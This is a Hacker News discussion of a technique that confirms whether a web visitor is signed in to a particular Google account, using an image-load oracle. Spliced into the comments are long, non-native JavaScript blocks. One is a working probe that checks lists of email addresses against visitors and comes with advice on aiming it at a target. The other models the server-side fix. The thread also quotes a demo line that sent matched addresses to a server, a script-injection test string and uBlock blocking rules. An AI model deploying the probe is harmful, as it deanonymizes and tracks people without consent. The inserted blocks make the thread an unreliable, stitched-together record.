
How to confirm a Google user’s specific email address - TomAnthony
http://www.tomanthony.co.uk/blog/confirm-google-users-email/
======
patorjk
> which allows an attacker to confirm whether a visitor to a web page is
> logged in to any one of a list of specific Google accounts

I actually reported a similar problem to Google that would allow you to do the
same thing back in 2013 (and like you, I used the load and onerror methods for
detection). I didn't get a reward either :/.

However, Facebook paid me $1,000 for finding this problem for a particular
area of their website
([http://patorjk.com/blog/2013/03/01/facebook-user-identification-bug/](http://patorjk.com/blog/2013/03/01/facebook-user-identification-bug/)).
So I wouldn't write off this kind of security issue. It seems to depend on
who's giving out the bounty.
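
The image-load oracle that patorjk and the post describe, written out as an
added example (this is not code from the original post or from Google). The
endpoint URL and its `email=` query parameter are placeholders I assumed for
illustration; the real redirect URL is whatever the post documents. The probe
resolves true on `onload`, false on `onerror`, and "timeout" if neither fires,
and a small batch runner probes a candidate list with bounded concurrency.
`makeFakeImage` stands in for the browser's `Image` so the logic can be run
outside a browser against constructed data.

```javascript
// Added example (not from the original post): the <img> onload/onerror oracle.
// The endpoint and query parameter are placeholders (assumption), not Google's.
const PLACEHOLDER_ENDPOINT = "https://accounts.example.invalid/redirect";

// Build the probe URL for one candidate address (placeholder scheme, assumption).
function probeUrl(email, endpoint = PLACEHOLDER_ENDPOINT) {
  return `${endpoint}?email=${encodeURIComponent(email)}`;
}

// Probe one address. An <img> follows a 302 silently; if the final response is
// an image, onload fires (account present), otherwise onerror fires.
// `ImageCtor` is injectable so the same code runs under Node with a fake.
function probeAccount(email, { ImageCtor = globalThis.Image, timeoutMs = 5000, endpoint } = {}) {
  return new Promise((resolve) => {
    const img = new ImageCtor();
    const timer = setTimeout(() => {
      img.onload = img.onerror = null;
      resolve("timeout");
    }, timeoutMs);
    img.onload = () => { clearTimeout(timer); resolve(true); };
    img.onerror = () => { clearTimeout(timer); resolve(false); };
    img.src = probeUrl(email, endpoint);
  });
}

// Probe a candidate list with bounded concurrency; returns the addresses that hit.
async function probeList(emails, { concurrency = 4, ...opts } = {}) {
  const hits = [];
  let next = 0;
  async function worker() {
    while (next < emails.length) {
      const email = emails[next++];
      if ((await probeAccount(email, opts)) === true) hits.push(email);
    }
  }
  await Promise.all(Array.from({ length: Math.min(concurrency, emails.length) }, worker));
  return hits;
}

// Fake Image for running this outside a browser: "loads" only when the URL
// names an address in `signedIn` (constructed test data, not real accounts).
function makeFakeImage(signedIn) {
  return class FakeImage {
    set src(url) {
      const email = decodeURIComponent(new URL(url).searchParams.get("email"));
      setTimeout(() => (signedIn.has(email) ? this.onload?.() : this.onerror?.()), 0);
    }
  };
}
```

In a real page you would call `probeAccount("target@example.com")` with the
browser's own `Image`; the timeout matters because a blocked third-party
request (uBlock Origin, uMatrix, the filter rules later in this thread) fires
neither handler promptly, and a probe that treats silence as "not signed in"
will misreport.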

~~~
Merovius
Given that I regularly see my Facebook account name and photo on third party
websites, without giving them any permission to see those, I find it hard to
believe that Facebook cares about this…

~~~
patorjk
I agree with theGimp. From my experience they do seem to care about this. I
actually still carry the debit card they sent me in my wallet
([http://imgur.com/TuVKm5k](http://imgur.com/TuVKm5k)). Facebook also seems to
be the most generous in terms of giving out a reward. I ended up submitting a
few more issues after this and always got something reasonable (usually 1k to
1.5k).

------
michaelhoffman
This is an issue for those of us who do anonymous peer review of publications
that include references to the authors' web sites. It's bad enough that people
have tried to identify me just by location in their logs.

I recommend using Tor now. But most people won't.

~~~
nl
Tor won't help if you are logged into Google. The best solution here against
that problem is incognito mode plus a VPN.

~~~
michaelhoffman
I only use Tor for anonymous reviewing purposes so I don't log into Google
with it. But that's a good point.

~~~
djrogers
> I only use Tor for anonymous reviewing purposes so I don't log into Google
> with it

Not to get too pedantic, but Tor is a protocol, not a browser - if you use
your regular web browser over Tor, you’re still logged in.

On further thought, if you have only ever used a packaged ‘Tor browser’ that
is both a browser and implements the Tor protocol, then I can see where you’d
phrase it that way.

------
TomAnthony
Worth noting that this also works with GSuite email addresses.

Reddit user 'unsafeword' has suggested
([https://www.reddit.com/r/netsec/comments/6smdq0/how_to_confi...](https://www.reddit.com/r/netsec/comments/6smdq0/how_to_confirm_a_google_users_specific_email/))
that organisations like schools/universities could use this for
identifying their own users, as the list isn't that large.

------
biftek
This seems like a handy way to confirm email addresses when a user signs up to
your service. If it returns false, send a regular "confirm your email" email.

~~~
spicyj
Not a great idea since it would require trusting the client unless I'm missing
something.

~~~
Retr0spectrum
It depends on why you're checking emails. If it's just for password recovery,
for example, then it's the user's loss if they intentionally use an invalid
email.

------
dpkonofa
Is this really even a big issue? For one, you have to already have knowledge
of the email address in advance. Then you have to somehow get this user to go
to a page that you have control over. Then you have to get them to wait around
on your page while you run through 1000 possible email addresses every 25
seconds. Unless this got onto a really, really compelling page, I don't think
anyone is going to sit around waiting for a page like this to do its business.
The chances of getting a successful match are so low that I can understand why
it's not a priority to fix this.

~~~
raldi
I could use this to make a website where, when an HN admin looked at it, it
looked great, but when anyone else did, it was full of ads, redirected to
malware, or whatever.

Reddit could use it to figure out whether various celebrities were redditors
and track what they look at. Even if they never log in! And if they _did_ log
in, reddit could find out what their username was.

And that's just what I was able to think up in 30 seconds.

~~~
dpkonofa
With your first example, you _could_ do that but it wouldn't be realistic to
do that. Like I said, you'd have to know the admin's logged in Google email
address already and then they'd have to sit on that page for over 2 hours
before you even hit a statistical probability of a match. It would really only
work if you were trying to target one specific person. If you were fishing for
users from a leak of users or something, this would literally do nothing.

As for the Reddit option, Reddit would already know if the celebrities were
redditors because they'd have to know their email address in advance anyways
for this trick to work. No celebrity is going to risk setting up a Reddit
account without an email address so Reddit already has that info. On top of
that, what's reddit going to do with a celebrity's email address and username?
It's already required for verification on anything important a celebrity would
use it for (like an AMA or promos).

Val Kilmer is a redditor. What exactly would I gain from knowing if Val Kilmer
is logged in to his Google account?

~~~
raldi
> they'd have to sit on that page for over 2 hours before you even hit a
> statistical probability of a match.

No, it would be instantaneous. If you have a specific email address in mind,
you test it, and immediately get "yes, it's them" / "no, it's not them" in
milliseconds.

> No celebrity is going to risk setting up a Reddit account without an email
> address

Huh? You don't think famous people have pseudonymous Internet accounts?

> Val Kilmer is a redditor. What exactly would I gain from knowing if Val
> Kilmer is logged in to his Google account?

"Val Kilmer's secret reddit username is i_love_horse_porn"

~~~
dpkonofa
>No, it would be instantaneous. If you have a specific email address in mind,
you test it, and immediately get "yes, it's them" / "no, it's not them" in
milliseconds.

Again...you'd already have to know the email address and what benefit does it
give you to know that this specific person is logged in? You'd have to somehow
get that specific person to visit your page in the first place.

>pseudonymous Internet accounts

I know they do. I just don't see what that gets me if I already know their
email address.

>i_love_horse_porn

The only people that would be able to gather this information from this
exploit are Reddit admins and they'd already have that information from the
email address. Even still... what would they even do with that information?

~~~
askmike
> Again...you'd already have to know the email address and what benefit does
> it give you to know that this specific person is logged in?

You can link users (that you target) to specific websites (that you indirectly
control, even through something like a malicious ad).

> The only people that would be able to gather this information from this
> exploit are Reddit admins and they'd already have that information from the
> email address. Even still... what would they even do with that information?

No! I (as a non admin) could create a website that uses this exploit right now
and link targets (like reddit admins of which I know the gmail) to my website.
Post the website to reddit, and voila. Once they visit the site I know they
did.

~~~
dpkonofa
And again, I ask... What information or benefit does that give you that you
didn't know before? This only works on specific people and targets that you've
had to identify before using this. I have yet to hear of a specific example of
this being used for nefarious purposes outside of confirming that someone
visited a page and there are hundreds of ways to do that without needing to
invoke this workaround.

~~~
askmike
Could you give me any other example of an exploit that allows an attacker to
tell that a specific gmail user is on a website?

------
leephillips
Yet another reason I'm glad I use uBlock Origin set to block all 3rd party
requests. To get the demo to work, I had to disable uBlock.

~~~
quakeguy
Even better to use uMatrix for browsing, I think. You can enable several or all
elements on a site and so on. Use it with a hosts file like the one from:

someonewhocares.org

and you are even better off. imo.

------
jtokoph
Google can probably prevent the information leak via image tags by not using a
302 redirect and instead using a 200 response and a combination of <meta
refresh> and JS document.location.

This way, the image tag will always fire the onError

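A model of the fix jtokoph describes, as an added example (this is not Google's
code and not from the post). Two simulated server handlers answer the same
probe: the vulnerable one 302-redirects to an image URL for a signed-in
account, the hardened one always returns a 200 `text/html` body that navigates
with `<meta http-equiv=refresh>` and `document.location`. `imgOutcome` models
what an `<img>` does with each: it follows HTTP redirects but never executes
HTML, so it only fires `onload` when the final response is an image. Paths,
the session shape and the static routes are placeholders I constructed.

```javascript
// Added example (not Google's code): why a 302 leaks to <img> and a 200+refresh does not.
// Paths, session shape and routes are constructed placeholders (assumptions).

// Vulnerable shape: the response status chain differs by login state and
// an <img> follows it all the way to the image bytes.
function vulnerableHandler(session, email) {
  const target = session.accounts.includes(email)
    ? "/photo/" + encodeURIComponent(email)
    : "/login";
  return { status: 302, headers: { location: target }, body: "" };
}

// Hardened shape: always 200 text/html. The navigation lives in the HTML,
// which a browser executes for a top-level document but never for an <img>.
function hardenedHandler(session, email) {
  const target = session.accounts.includes(email)
    ? "/photo/" + encodeURIComponent(email)
    : "/login";
  const body =
    `<!doctype html><meta http-equiv="refresh" content="0;url=${target}">` +
    `<script>document.location=${JSON.stringify(target)}</script>`;
  return { status: 200, headers: { "content-type": "text/html" }, body };
}

// Static routes reached after a redirect (constructed).
function fetchPath(path) {
  if (path.startsWith("/photo/")) {
    return { status: 200, headers: { "content-type": "image/png" }, body: "<png bytes>" };
  }
  return { status: 200, headers: { "content-type": "text/html" }, body: "<html>login</html>" };
}

// What an <img> tag does: follow 3xx redirects (bounded), then fire onload
// only if the final response is a 200 image; anything else is onerror.
function imgOutcome(firstResponse, maxRedirects = 5) {
  let res = firstResponse;
  for (let i = 0; i < maxRedirects && res.status >= 300 && res.status < 400; i++) {
    res = fetchPath(res.headers.location);
  }
  const type = res.headers["content-type"] || "";
  return res.status === 200 && type.startsWith("image/") ? "onload" : "onerror";
}

// Outcome of probing `email` against `handler` for a given session.
function probeOutcome(handler, session, email) {
  return imgOutcome(handler(session, email));
}
```

With the vulnerable handler the outcome differs by whether the probed address
is in the session; with the hardened handler it is `onerror` either way. The
hardened body still differs between the two cases, which is why the follow-up
about cross-origin XHR matters: without CORS headers the page cannot read that
body, so the `<img>` oracle is closed without reopening a fetch-based one.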
~~~
askmike
not that hard to replace the image with a function that does an ajax call and
checks response code.

~~~
twiss
You can't read the response of cross-origin ajax requests unless the response
specifically allows it (with CORS).

------
proactivesvcs
> 18th July – The team came back to me and asked me what my suggestions for
> handling this would be.

Surely they would make an offer of how much they would like to pay the OP
before they expect the OP to work for them?

------
robin_reala
Dead server, Google Cache is at
[https://webcache.googleusercontent.com/search?q=cache:http%3...](https://webcache.googleusercontent.com/search?q=cache:http%3A%2F%2Fwww.tomanthony.co.uk%2Fblog%2Fconfirm%2Dgoogle%2Dusers%2Demail%2F)

~~~
TomAnthony
Yeah, I was fiddling with the caching. Should be back now! Thanks! :)

------
seanalltogether
I'm trying to understand the implications here. Is the author suggesting that
real world attack would involve randomly generating email addresses to see if
they are valid or not based on whether they might match the current user. Or
would the attack involve purchasing a list known email addresses from
spammers, and then doing lookup against that list for every visitor that comes
to your website?

Option 1 seems like it would take impossibly long to match, and I'm not sure
what actionable information you get from option 2, other than maybe verifying
that the email address is still active?

~~~
stevep98
What about if I sent a proposal with my website to a bunch of investors that I
know, and I want to see which ones clicked on it.

~~~
Viper007Bond
You could also just use unique URLs (tracking, etc.).

------
chrisparton1991
This is neat, worked for me (I'm signed in to two Google accounts, both were
detected).

This is really neither here nor there, but your email input field isn't
escaped, so JS can be injected into the email field e.g. <script>alert('Hi
Tom!')</script>.

I enjoy the irony of a security-minded page having this issue, even though
there's no good reason for you to bother escaping the field :)

------
bkovacev
Off-topic, but shout out to Tom (author of the article) and Duncan @Distilled
for being great guys. I interviewed with them for a developer position few
years back, and while I usually forget the interviewers these two were
extremely nice. I didn't get the job, but they left a great impression. If
they're hiring in the RD department at Distilled make sure to apply!

------
Timshel
Those issues make
[https://wiki.mozilla.org/Security/Contextual_Identity_Projec...](https://wiki.mozilla.org/Security/Contextual_Identity_Project/Containers)
essential. I hope Mozilla will continue to improve the feature.

------
AndrewCHM

        ||accounts.google.com^$image,third-party
        ||google.com/accounts/*$image,third-party
    

For those that want to prevent the attack with ublocko, without filtering all
3rd party requests

------
hobarrera
Won't disabling third party cookies avoid this sort of issues?

------
royalharsh95
You cannot if you are using Privacy Badger.

------
yorick
Note that the demo sends your email address to the server if it's a hit.

$.ajax({ url: "/google_leak/save.php?info=manual_hit:" + email });

update: gone now. still pings that it ran. don't forget to hit ctrl-shift-r to
bypass your cache.

~~~
TomAnthony
Sorry - that was for debugging purposes and I forgot to remove it. I've
removed that and purged the log.

~~~
marksomnian
Thank you - I had assumed malice, glad I was proven wrong.

~~~
FRex
Still there for me..

~~~
TomAnthony
I assume it was cached for you. I did purge the CloudFlare cache when I made
the change, and only 2 more entries hit the log after that (which I also
cleared). :)

~~~
FRex
It's gone.

